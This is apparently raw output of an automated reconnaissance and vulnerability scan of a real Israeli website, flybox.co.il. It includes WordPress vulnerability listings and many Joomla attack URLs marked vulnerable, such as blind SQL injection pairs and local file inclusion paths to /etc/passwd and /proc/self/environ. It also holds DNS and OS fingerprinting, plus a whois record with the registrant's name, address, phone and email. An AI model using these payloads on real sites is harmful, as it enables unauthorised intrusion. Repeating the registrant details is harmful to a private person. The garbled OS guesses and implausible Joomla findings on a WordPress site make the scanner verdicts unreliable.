 |  Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
 |  Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
 |  Reference: http://seclists.org/oss-sec/2017/q1/562
 |  Reference: https://hackerone.com/reports/153093
 |  Fixed in: 4.5.7
 |  Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
 |  Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 |  Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
 |  Reference: https://core.trac.wordpress.org/ticket/25239
 |  Fixed in: None
 |  Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
 |  Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
 |  Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |  Fixed in: 4.5.9
 |  Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
 |  Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |  Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
 |  Fixed in: 4.5.9
 |  Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
 |  Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |  Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
 |  Fixed in: 4.5.9
 |  Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
 |  Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |  Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
 |  Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
 |  Fixed in: 4.5.9
 |  Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
 |  Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |  Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
 |  Reference: https://hackerone.com/reports/203515
 |  Reference: https://hackerone.com/reports/203515
 |  Fixed in: 4.5.9
 |  Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
 |  Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
 |  Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
 |  Fixed in: 4.5.9
 |  Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
 |  Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |  Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |  Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
 |  Fixed in: 4.5.10
 |  Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
 |  Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
 |  Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |  Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |  Reference: https://wpvulndb.com/vulnerabilities/8905
 |  Fixed in: 4.7.5
 |  Title: WordPress 2.9.2-4.8.1 - Open Redirect
 |  Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |  Reference: https://core.trac.wordpress.org/changeset/41398
 |  Fixed in: 4.5.10
 |  Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
 |  Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |  Reference: https://core.trac.wordpress.org/changeset/41457
 |  Fixed in: 4.5.10
 |  Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
 |  Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |  Reference: https://core.trac.wordpress.org/changeset/41448
 |  Fixed in: 4.5.10
 |  Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
 |  Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |  Reference: https://core.trac.wordpress.org/changeset/41395
 |  Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
 |  Fixed in: 4.5.10
 |  Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
 |  Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
 |  Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
 |  Reference: https://twitter.com/ircmaxell/status/923662170092638208
 |  Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
 |  Fixed in: 4.5.11
 |  Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
 |  Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |  Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
 |  Fixed in: 4.5.12
 |  Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
 |  Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |  Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
 |  Fixed in: 4.5.12
 |  Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
 |  Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |  Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
 |  Fixed in: 4.5.12
 |  Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
 |  Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |  Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
 |  Fixed in: 4.5.12


[*] Passive enumerate themes..
[+] Name: blue-summit-wp-bootstrap
 |  Theme Name: Flybox
 |  Style: https://www.flybox.co.il/wp-content/themes/blue-summit-wp-bootstrap/style.css

[*] Passive enumerate plugins..
[+] Name: popup-builder';SG_POPUP_VERSION='2.31_1'<
[+] Name: accordions
 |  Readme: https://www.flybox.co.il/wp-content/plugins/accordions/readme.txt
Target: http://flybox.co.il

Server: cloudflare
X-Powered-By: PHP/7.0.13


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected.
[!] The vulnerability probing may be logged and protected.

[!] A Joomla! J-Firewall (com_jfw) is detected.
[!] The vulnerability probing may be logged and protected.

[!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected.
[!] The vulnerability probing may be logged and protected.

[!] A SecureLive Joomla! firewall is detected.
[!] The vulnerability probing may be logged and protected.

[!] FWScript(from firewallscript.com) is likely to be used.
[!] The vulnerability probing may be logged and protected.

[!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected.
[!] It is likely that webmaster routinely checks insecurities.

[!] A security scanner (com_securityscanner/com_securityscan) is detected.

[!] A Joomla! jSecure Authentication is detected.
[!] You need additional secret key to access /administrator directory
[!] Default is jSecure like /administrator/?jSecure ;)

[!] A Joomla! GuardXT Security Component is detected.
[!] It is likely that webmaster routinely checks for insecurities.

[!] A Joomla! JoomSuite Defender is detected.
[!] The vulnerability probing may be logged and protected.


## Fingerprinting in progress ...

~Unable to detect the version. Is it sure a Joomla?

## Fingerprinting done.


Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 39
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? Yes

# 123
Info -> Component: custompages Remote File Inclusion Vulnerability
Versions Affected: 1.1 <=
Check: /components/com_custompages/
Exploit: /index.php?option=com_custompages&cpage=
Vulnerable? Yes

# 207
Info -> Component: com_mycontent Blind SQL Injection Vulnerability
Version Affected: N/A
Check: /components/com_mycontent/
Exploit: /index.php?option=com_mycontent&task=view&id=1+and+1=1::/index.php?option=com_mycontent&task=view&id=1+and+1=2
Vulnerable? Yes

# 208
Info -> Component: Joo!BB Blind SQL Injection Vulnerability
Version Affected: 0.5.9 or lower
Check: /components/com_joobb/
Exploit: /index.php?option=com_joobb&view=forum&forum=1+and+1=1::/index.php?option=com_joobb&view=forum&forum=1+and+1=2
Vulnerable? Yes

# 209
Info -> Component: acctexp Blind SQL Injection Vulnerability
Version Affected: <= 0.12
Check: /components/com_acctexp/
Exploit: /index.php?option=com_acctexp&task=subscribe&usage=1+and+1=1::/index.php?option=com_acctexp&task=subscribe&usage=1+and+1=2
Vulnerable? Yes

# 213
Info -> Component: JooBlog Blind SQL Injection Vulnerability
Version Affected: 0.1.1<=
Check: /components/com_jb2/
Exploit: /index.php?option=com_jb2&view=category&CategoryID=1+and+1=1::/index.php?option=com_jb2&view=category&CategoryID=1+and+1=2
Vulnerable? Yes

# 214
Info -> Component: jotloader Blind SQL Injection Vulnerability
Version Affected: 1.2.1.a<=
Check: /components/com_jotloader/
Exploit: /index.php?option=com_jotloader&cid=1+and+1=1::/index.php?option=com_jotloader&cid=1+and+1=2
Vulnerable? Yes

# 220
Info -> Component: News Portal Blind SQL Injection Vulnerability
Version Affected: 1.0 <=
Check: /components/com_news_portal/
Exploit: /index.php?option=com_news_portal&Itemid=1+and+1=1::/index.php?option=com_news_portal&Itemid=1+and+1=2
Vulnerable? Yes

# 232
Info -> Component: com_ezstore Blind SQL Injection Vulnerability
Version Affected: N/A
Check: /components/com_ezstore/
Exploit: /index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=1::/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=2
Vulnerable? Yes

# 243
Info -> Component: Archaic Binary Gallery Directory Traversal Vulnerability
Version Affected: 1.0<=
Check: /components/com_ab_gallery/
Exploit: /index.php?option=com_ab_gallery&Itemid=37&gallery=_NOT_EXIST
Vulnerable? Yes


# 248
Info -> Component: ProDesk (com_pro_desk) Local File Inclusion Vulnerability
Version Affected: 1.2<=
Check: /components/com_pro_desk/
Exploit: /index.php?option=com_pro_desk&include_file=
Vulnerable? Yes

# 264
Info -> Component: Com Profiler Blind SQL Injection	Vulnerability
Versions effected: 1.0 RC2 and older
Check: /administrator/components/com_comprofiler/
Exploit: /index.php?option=com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
Vulnerable? Yes


# 302
Info -> Component: com_ijoomla_archive (catid) Blind SQL Injection Vulnerability
Versions Affected: N/A
Check: /components/com_ijoomla_archive/
Exploit: /index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=1::/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=2
Vulnerable? Yes


# 339
Info -> Component: com_letterman Remote File Inclusion Vulnerability
Versions effected: N/A
Check: /components/com_letterman/
Exploit: /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=
Vulnerable? Yes

# 345
Info -> Component: com_hbssearch Blind SQL Injection Vulnerability
Versions Affected: N/A
Check: /components/com_hbssearch/
Exploit: /index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=1::/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=2
Vulnerable? Yes


# 348
Info -> Component: com_lowcosthotels (id) Blind SQL Injection Vulnerability
Versions Affect: N/A
Check: /components/com_lowcosthotels/
Exploit: /index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=2
Vulnerable? Yes

# 349
Info -> Component: com_allhotels (id) Blind SQL Injection Vulnerability
Versions Affect: N/A
Check: /components/com_allhotels/
Exploit: /index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=2
Vulnerable? Yes

# 350
Info -> Component: com_ice(catid) Blind SQL Injection Vulnerability
Versions Affected: N/A
Check: /components/com_ice/
Exploit: /index.php?option=com_ice&catid=1 and 1=1::/index.php?option=com_ice&catid=1 and 1=2
Vulnerable? Yes


# 355
Info -> Component: com_na_content Blind SQL Injection Vulnerability
Versions effected: v 1.0 <=
Check: /components/com_na_content/
Exploit: /index.php?option=com_na_content&task=view&id=1+and+1=1::/index.php?option=com_na_content&task=view&id=1+and+1=2
Vulnerable? Yes

# 375
Info -> Component: PC CookBook Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_pccookbook/
Exploit: /index.php?option=com_pccookbook&page=viewrecipe&recipe_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
Vulnerable? Yes

# 376
Info -> Component: com_waticketsystem Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_waticketsystem/
Exploit: /index.php?option=com_waticketsystem&act=category&catid=1+and+1=1::/index.php?option=com_waticketsystem&act=category&catid=1+and+1=2
Vulnerable? Yes

# 379
Info -> Component: com_rss DOS Vulnerability
Versions effected: Joomla! <= 1.0.7
Check: /components/com_rss/
Exploit: /index2.php?option=com_rss&feed=test
Vulnerable? Yes


# 388
Info -> Component: Seminar com_seminar Blind SQL Injection Vulnerability
Versions effected: 2.0.4 <=
Check: /components/com_seminar/
Exploit: /index.php?option=com_seminar&task=View_seminar&id=1+and+1=1::index.php?option=com_seminar&task=View_seminar&id=1+and+1=2
Vulnerable? Yes

# 389
Info -> Component: Omilen Photo Gallery Local File Inclusion Vulnerability
Versions effected: 0.5b <=
Check: /components/com_omphotogallery/
Exploit: /index.php?option=com_omphotogallery&controller=
Vulnerable? Yes

# 403
Info -> Component: com_projectfork Local File Inclusion Vulnerability
Versions effected: 2.0.10 <=
Check: /components/com_projectfork/
Exploit: /index.php?option=com_projectfork&section=
Vulnerable? Yes


# 437
Info -> Component: com_clickheat Remote File Inclusion Vulnerability
Versions effected: N/A
Check: /components/com_clickheat/
Exploit: /index.php?option=com_ clickheat&task=
Vulnerable? Yes


# 454
Info -> Component: Almond Classifieds com_aclassf (id) Blind SQL Injection Vulnerability
Versions effected: 5.6.2 <=
Check: /components/com_aclassf/
Exploit: /index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=1::/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=2
Vulnerable? Yes

# 455
Info -> Component: Almond Classifieds com_aclassf (replid) Blind SQL Injection Vulnerability
Versions effected: 7.5 <=
Check: /components/com_aclassf/
Exploit: /index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=1::/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=2
Vulnerable? Yes

# 459
Info -> Component: Kunena Forums com_kunena (func) Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_kunena/
Exploit: /index.php?option=com_kunena&Itemid=-3&func=1+and+1=1::/index.php?option=com_kunena&Itemid=-3&func=1+and+1=2
Vulnerable? Yes

# 460
Info -> Component: com_misterestate Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_misterestate/
Exploit: /index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=1::/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=2
Vulnerable? Yes


# 468
Info -> Component: JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities: Local File Inclusion
Versions Affected: 1.0
Check: /index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 475
Info -> Component: JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion
Versions Affected: 1.0 Alpha 3
Check: /index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 476
Info -> Component: JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion
Versions Affected: 1.0 Alpha 3
Check: /index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
Exploit: /index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
Vulnerable? Yes

# 494
Info -> Component: Jgrid Local File Inclusion
Versions Affected: 1.0
Check: /index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 523
Info -> Component: Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability
Versions Affected: Any
Check: /index.php?option=com_seyret&view=
Exploit: /index.php?option=com_seyret&view=
Vulnerable? Yes

# 525
Info -> Component: Joomla Component (com_obSuggest) Local File Inclusion Vulnerability
Versions Affected: Any
Check: /index.php?option=com_obsuggest&controller=
Exploit: /index.php?option=com_obsuggest&controller=
Vulnerable? Yes

# 528
Info -> Component: Joomla Component Matamko Local File Inclusion Vulnerability
Versions Affected: Any
Check: /index.php?option=com_matamko&controller=
Exploit: /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 534
Info -> Component: Joomla Component (com_jimtawl) Local File Inclusion Vulnerability
Versions Affected: Any
Check: /index.php?option=com_jimtawl&Itemid=12&task=
Exploit: /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00
Vulnerable? Yes

# 537
Info -> Component: Joomla Component (com_connect) Local File Inclusion Vulnerability
Versions Affected: Any
Check: /index.php?option=com_connect&view=connect&controller=
Exploit: /index.php?option=com_connect&view=connect&controller=../../../CREDITS.php%00
Vulnerable? Yes

# 538
Info -> Component: Joomla com_quran SQL Injection vulnerability
Versions Affected: Any
Check: /component/quran/index.php?option=com_quran&action=viewayat&surano=
Exploit: /component/quran/index.php?option=com_quran&action=viewayat&surano=
Vulnerable? No

# 544
Info -> Component: YJ Contact us - Enhanced Joomla Contact Form Local File Inclusion
Versions Affected: "Any"
Check: /index.php?option=com_yjcontactus&view=
Exploit: /index.php?option=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 546
Info -> Component: JoomTouch Local File Inclusion
Versions Affected: 1.0.2
Check: /index.php?option=com_joomtouch&controller=
Exploit: /index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 551
Info -> Component: Joomla Component FDione Form Wizard Local File Inclusion
Versions Affected: 1.0.2 <=
Check: /index.php?option=com_dioneformwizard&controller=[LFI]%00
Exploit: /index.php?option=com_dioneformwizard&controller=[LFI]%00
Vulnerable? Yes

# 553
Info -> Component: Component advertising Local File Inclusion
Versions Affected: 2.0 <=
Check: /index.php?option=com_aardvertiser&cat_name=conf&task=<=
Exploit: /index.php?option=com_aardvertiser&cat_name=conf&task=
Vulnerable? Yes

# 554
Info -> Component: Component advertising Local File Inclusion
Versions Affected: 2.0 <=
Check: /index.php?option=com_aardvertiser&task=
Exploit: /index.php?option=com_aardvertiser&task=
Vulnerable? Yes


# 556
Info -> Component: Custom PHP Pages Component Local File Inclusion
Versions Affected: Any <=
Check: /index.php?option=com_php&file=../images/phplogo.jpg
Exploit: /index.php?option=com_php&file=../images/phplogo.jpg
Vulnerable? Yes

# 557
Info -> Component: Custom PHP Pages Component Local File Inclusion
Versions Affected: Any <=
Check: /index.php?option=com_php&file=../js/ie_pngfix.js
Exploit: /index.php?option=com_php&file=../js/ie_pngfix.js
Vulnerable? Yes

# 558
Info -> Component: Custom PHP Pages Component Local File Inclusion
Versions Affected: Any <=
Check: /index.php?option=com_php&file=../../../../../../../../../../etc/passwd
Exploit: /index.php?option=com_php&file=../../../../../../../../../../etc/passwd
Vulnerable? Yes


# 568
Info -> Component: SmartSite Local File Inclusion
Versions Affected: Any <=
Check: /index.php?option=com_smartsite&controller=
Exploit: /index.php?option=com_smartsite&controller=
Vulnerable? Yes

# 569
Info -> Component: NoticeBoard Local File Inclusion
Versions Affected: 1.3<=
Check: /index.php?option=com_noticeboard&controller=
Exploit: /index.php?option=com_noticeboard&controller=
Vulnerable? Yes

# 570
Info -> Component: Ultimate Portfolio Local File Inclusion
Versions Affected: 1.0<=
Check: /index.php?option=com_ultimateportfolio&controller=
Exploit: /index.php?option=com_ultimateportfolio&controller=
Vulnerable? Yes

# 590
Info -> Component: Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability
Versions Affected: Any <=
Check: /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 591
Info -> Component: Joomla Component Deluxe Blog Factory com_blogfactory Local File Inclusion Vulnerability
Versions Affected: Any <=
Check: /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 592
Info -> Component: Joomla Component Delicious Bookmarks com_delicious Local File Inclusion Vulnerability
Versions Affected: Any <=
Check: /index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 593
Info -> Component: Joomla Component JA Comment com_jacomment Local File Inclusion Vulnerability
Versions Affected: Any <=
Check: /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 594
Info -> Component: Joomla Component Love Factory com_lovefactory Local File Inclusion Vulnerability
Versions Affected: Any <=
Check: /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 595
Info -> Component: Joomla com_worldrates Local File Inclusion Vulnerability
Versions Affected: Any <=
Check: /index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 596
Info -> Component: Joomla com_record Local File Inclusion Vulnerability
Versions Affected: Any <=
Check: /index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 597
Info -> Component: Joomla Component JA Voice com_javoice Local File Inclusion vulnerability
Versions Affected: Any <=
Check: /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
Vulnerable? Yes

# 598
Info -> Component: Joomla Component com_pcchess Local File Inclusion
Versions Affected: Any <=
Check: /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
Exploit: /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
Vulnerable? Yes
[92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +[0m
Server:		192.168.1.254
Address:	192.168.1.254#53

Non-authoritative answer:
Name:	flybox.co.il
Address: 104.31.75.239
Name:	flybox.co.il
Address: 104.31.74.239
Name:	flybox.co.il
Address: 2400:cb00:2048:1::681f:4bef
Name:	flybox.co.il
Address: 2400:cb00:2048:1::681f:4aef

flybox.co.il has address 104.31.74.239
flybox.co.il has address 104.31.75.239
flybox.co.il has IPv6 address 2400:cb00:2048:1::681f:4aef
flybox.co.il has IPv6 address 2400:cb00:2048:1::681f:4bef
flybox.co.il mail is handled by 75 alt2.aspmx.l.google.com.
flybox.co.il mail is handled by 125 aspmx3.googlemail.com.
flybox.co.il mail is handled by 50 alt1.aspmx.l.google.com.
flybox.co.il mail is handled by 0 aspmx.l.google.com.
flybox.co.il mail is handled by 100 aspmx2.googlemail.com.
[92m + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +[0m

Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu

[+] Target is flybox.co.il
[+] Loading modules.
[+] Following modules are loaded:
[x] [1] ping:icmp_ping  -  ICMP echo discovery module
[x] [2] ping:tcp_ping  -  TCP-based ping discovery module
[x] [3] ping:udp_ping  -  UDP-based ping discovery module
[x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
[x] [5] infogather:portscan  -  TCP and UDP PortScanner
[x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
[x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
[x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
[x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
[x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
[x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
[x] [12] fingerprint:smb  -  SMB fingerprinting module
[x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
[+] 13 modules registered
[+] Initializing scan engine
[+] Running scan engine
[-] ping:tcp_ping module: no closed/open TCP ports known on 104.31.75.239. Module test failed
[-] ping:udp_ping module: no closed/open UDP ports known on 104.31.75.239. Module test failed
[-] No distance calculation. 104.31.75.239 appears to be dead or no ports known
[+] Host: 104.31.75.239 is up (Guess probability: 50%)
[+] Target: 104.31.75.239 is alive. Round-Trip Time: 0.49955 sec
[+] Selected safe Round-Trip Time value is: 0.99909 sec
[-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
[-] fingerprint:smb need either TCP port 139 or 445 to run
[+] Primary guess:
[+] Host 104.31.75.239 Running OS: »ÎlU (Guess probability: 100%)
[+] Other guesses:
[+] Host 104.31.75.239 Running OS:  (Guess probability: 100%)
[+] Host 104.31.75.239 Running OS:  (Guess probability: 100%)
[+] Host 104.31.75.239 Running OS:  (Guess probability: 100%)
[+] Host 104.31.75.239 Running OS: »ÎlU (Guess probability: 100%)
[+] Host 104.31.75.239 Running OS:  (Guess probability: 100%)
[+] Host 104.31.75.239 Running OS: »ÎlU (Guess probability: 100%)
[+] Host 104.31.75.239 Running OS:  (Guess probability: 100%)
[+] Host 104.31.75.239 Running OS:  (Guess probability: 100%)
[+] Host 104.31.75.239 Running OS:  (Guess probability: 100%)
[+] Cleaning up scan engine
[+] Modules deinitialized
[+] Execution completed.
[92m + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +[0m

% The data in the WHOIS database of the .il registry is provided
% by ISOC-IL for information purposes, and to assist persons in
% obtaining information about or related to a domain name
% registration record. ISOC-IL does not guarantee its accuracy.
% By submitting a WHOIS query, you agree that you will use this
% Data only for lawful purposes and that, under no circumstances
% will you use this Data to: (1) allow, enable, or otherwise
% support the transmission of mass unsolicited, commercial
% advertising or solicitations via e-mail (spam);
% or  (2) enable high volume, automated, electronic processes that
% apply to ISOC-IL (or its systems).
% ISOC-IL reserves the right to modify these terms at any time.
% By submitting this query, you agree to abide by this policy.

query:        flybox.co.il

reg-name:     flybox
domain:       flybox.co.il

descr:        Ofer Bar
descr:        Kibutz Hulda
descr:        Kibutz Hulda
descr:        11111
descr:        Israel
phone:        +972 54 3035371
fax-no:       +972 9 9574370
admin-c:      IS-OB5539-IL
tech-c:       IS-ID1078-IL
zone-c:       IS-ID1078-IL
nserver:      athena.ns.cloudflare.com
nserver:      vin.ns.cloudflare.com
validity:     04-09-2019
DNSSEC:       unsigned
status:       Transfer Locked
changed:      domain-registrar AT isoc.org.il 20130904 (Assigned)
changed:      domain-registrar AT isoc.org.il 20161012 (Changed)

person:       Ofer Bar
address:      Ofer Bar
address:      Kibutz Hulda
address:      Kibutz Hulda
address:      11111
address:      Israel
phone:        +972 54 3035371
fax-no:       +972 9 9574370
e-mail:       tsahye AT gmail.com
nic-hdl:      IS-OB5539-IL
changed:      domain-registrar AT isoc.org.il 20130904
changed:      Managing Registrar 20150805

person:       Interspace Domreg
address:      Interspace Ltd.
address:      P.O.Box 8723
address:      Netanya
address:      42505
address:      Israel
phone:        +972 73 2224444
fax-no:       +972 73 2224440
e-mail:       domreg AT interspace.net
nic-hdl:      IS-ID1078-IL
changed:      Managing Registrar 20070110
changed:      Managing Registrar 20070319
changed:      Managing Registrar 20070909
changed:      Managing Registrar 20090514
changed:      Managing Registrar 20110720
changed:      Managing Registrar 20110720
changed:      Managing Registrar 20110721
changed:      Managing Registrar 20111128
changed:      Managing Registrar 20111128
changed:      Managing Registrar 20130924
changed:      Managing Registrar 20130924
changed:      Managing Registrar 20130924
changed:      Managing Registrar 20130924
